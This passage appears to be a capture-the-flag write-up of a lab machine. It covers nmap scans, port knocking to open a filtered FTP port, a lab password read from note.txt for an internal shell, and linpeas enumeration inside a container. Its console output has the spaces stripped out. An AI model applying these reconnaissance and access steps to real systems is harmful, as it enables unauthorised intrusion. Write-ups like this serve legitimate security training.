$nmap-sC-sV-p--oNnmap.out10.10.96.70Nmapscanreportfor10.10.96.70Hostisup (0.16s latency).Notshown:65530closedportsPORTSTATESERVICEVERSION21/tcpfilteredftp22/tcpopensshOpenSSH7.6p1Ubuntu4ubuntu0.3 (Ubuntu Linux; protocol2.0)|ssh-hostkey:|204837:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)|25653:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)|_256ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)2375/tcpfiltereddocker4420/tcpopennvm-express?|fingerprint-strings:|DNSVersionBindReqTCP,GenericLines,GetRequest,HTTPOptions,RTSPRequest:|INTERNALSHELLSERVICE|pleasenote:cdcommandsdonotworkatthemoment,thedevelopersarefixingitatthemoment.|ctrl-c|Pleaseenterpassword:|Invalidpassword...|ConnectionClosed|NULL,RPCCheck:|INTERNALSHELLSERVICE|pleasenote:cdcommandsdonotworkatthemoment,thedevelopersarefixingitatthemoment.|ctrl-c|_Pleaseenterpassword:8080/tcpfilteredhttp-proxy1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4420-TCP:V=7.91%I=7%D=6/8%Time=60BF02E4%P=x86_64-pc-linux-gnu%r(NULSF:L,A0,"INTERNAL\x20SHELL\x20SERVICE\nplease\x20note:\x20cd\x20commands\xSF:20do\x20not\x20work\x20at\x20the\x20moment,\x20the\x20developers\x20areSF:\x20fixing\x20it\x20at\x20the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nSF:Please\x20enter\x20password:\n")%r(GenericLines,C6,"INTERNAL\x20SHELL\xSF:20SERVICE\nplease\x20note:\x20cd\x20commands\x20do\x20not\x20work\x20atSF:\x20the\x20moment,\x20the\x20developers\x20are\x20fixing\x20it\x20at\x2SF:0the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPlease\x20enter\x20passwoSF:rd:\nInvalid\x20password\.\.\.\nConnection\x20Closed\n")%r(GetRequest,CSF:6,"INTERNAL\x20SHELL\x20SERVICE\nplease\x20note:\x20cd\x20commands\x20dSF:o\x20not\x20work\x20at\x20the\x20moment,\x20the\x20developers\x20are\x2SF:0fixing\x20it\x20at\x20the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPleSF:ase\x20enter\x20password:\nInvalid\x20password\.\.\.\nConnection\x20CloSF:sed\n")%r(HTTPOptions,C6,"INTERNAL\x20SHELL\x20SERVICE\nplease\x20note:SF:\x20cd\x20commands\x20do\x20not\x20work\x20at\x20the\x20moment,\x20the\SF:x20developers\x20are\x20fixing\x20it\x20at\x20the\x20moment\.\ndo\x20noSF:t\x20use\x20ctrl-c\nPlease\x20enter\x20password:\nInvalid\x20password\.SF:\.\.\nConnection\x20Closed\n")%r(RTSPRequest,C6,"INTERNAL\x20SHELL\x20SSF:ERVICE\nplease\x20note:\x20cd\x20commands\x20do\x20not\x20work\x20at\x2SF:0the\x20moment,\x20the\x20developers\x20are\x20fixing\x20it\x20at\x20thSF:e\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPlease\x20enter\x20password:SF:\nInvalid\x20password\.\.\.\nConnection\x20Closed\n")%r(RPCCheck,A0,"INSF:TERNAL\x20SHELL\x20SERVICE\nplease\x20note:\x20cd\x20commands\x20do\x20SF:not\x20work\x20at\x20the\x20moment,\x20the\x20developers\x20are\x20fixiSF:ng\x20it\x20at\x20the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPlease\xSF:20enter\x20password:\n")%r(DNSVersionBindReqTCP,C6,"INTERNAL\x20SHELL\xSF:20SERVICE\nplease\x20note:\x20cd\x20commands\x20do\x20not\x20work\x20atSF:\x20the\x20moment,\x20the\x20developers\x20are\x20fixing\x20it\x20at\x2SF:0the\x20moment\.\ndo\x20not\x20use\x20ctrl-c\nPlease\x20enter\x20passwoSF:rd:\nInvalid\x20password\.\.\.\nConnection\x20Closed\n");ServiceInfo:OS:Linux; CPE:cpe:/o:linux:linux_kernel
Port 4420 was an internal shell, which also required a password
Port 2375 - may be a docker container is there!
Port Knocking
At this point, I didn't know how to proceed further. So, I just went and read a write up.
I learnt a new thing called port knocking.
In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports.
Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s).
A variant called single packet authorization (SPA) exists, where only a single "knock" is needed, consisting of an encrypted packet.
The post in the website, gives the hint about port knocking and the sequence of ports to be knocked:
Before port knocking, nmap showing ftp being filtered:
$nmap-p21,22,2375,4420,808010.10.151.249StartingNmap7.91 ( https://nmap.org ) at 2021-06-08 12:17 ISTNmapscanreportfor10.10.151.249Hostisup (0.21s latency).PORTSTATESERVICE21/tcpfilteredftp22/tcpopenssh2375/tcpfiltereddocker4420/tcpopennvm-express8080/tcpopenhttp-proxyNmapdone:1IPaddress (1 hostup) scanned in 0.63 seconds
Port knocking the correct sequence using nc:
v - verbose
z - zero mode (used for scanning)
One can also use knock or nmap -Pn to do the same.
The contents of the note.txt gave the password for the internal shell in port 4420:
$catnote.txtIncaseIforgetmypassword,I'm leaving a pointer to the internal shell service on the server.Connect to port 4420, the password is sardinethecat.- catlover
Internal Shell
Login into the internal shell using the password found:
root@7546fa2336d6:/root#chmod+xlinpeas.shroot@7546fa2336d6:/root#./linpeas.sh>linpeas.out[..snip..][+] System statsFilesystem Size Used Avail Use% Mounted on
overlay20G7.3G12G40%/tmpfs64M064M0%/devtmpfs240M0240M0%/sys/fs/cgroupshm64M064M0%/dev/shm/dev/xvda120G7.3G12G40%/opt/cleantmpfs240M0240M0%/proc/acpitmpfs240M0240M0%/proc/scsitmpfs240M0240M0%/sys/firmwaretotalusedfreesharedbuff/cacheavailableMem:4906603449481792431480127788102468Swap:000[..snip..]